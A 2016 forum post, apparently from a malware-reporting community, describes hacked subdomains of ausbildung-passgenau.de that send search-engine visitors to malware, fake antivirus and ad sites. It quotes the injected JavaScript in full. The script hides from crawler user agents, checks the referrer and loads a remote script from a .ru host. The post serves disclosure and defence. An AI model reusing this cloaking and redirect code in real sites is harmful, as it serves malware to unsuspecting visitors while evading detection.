Author Topic: ausbildung-passgenau.de – a potpourri of badware!  (Read 3468 times)

0 Members and 1 Guest are viewing this topic.

March 15, 2016, 09:47:18 pm
Read 3468 times

neeklamy

  • Newbie

  • Offline
  • *

  • 1
There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.

Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
  • fullfilescenter.ausbildung-passgenau.de
  • newfiles2016.ausbildung-passgenau.de
  • fastwindows2016.ausbildung-passgenau.de
This Google search results page will show any of the links in action: https://www.google.co.uk/search?q=site:ausbildung-passgenau.de

This is the JavaScript doing the dirty work:

Code: [Select]
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
  || (ref.indexOf("google.") > 0)
  || ref.indexOf("rambler.") > 0
  || ref.indexOf("bing.") > 0
  || ref.indexOf("mail.") > 0
  || ref.indexOf("yahoo.") > 0
  || ref.indexOf("msn.") > 0
  || ref.indexOf("live.") > 0
  || ref.indexOf("vk.") > 0
  || showme == 'force') {
    document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
  }
}
</script>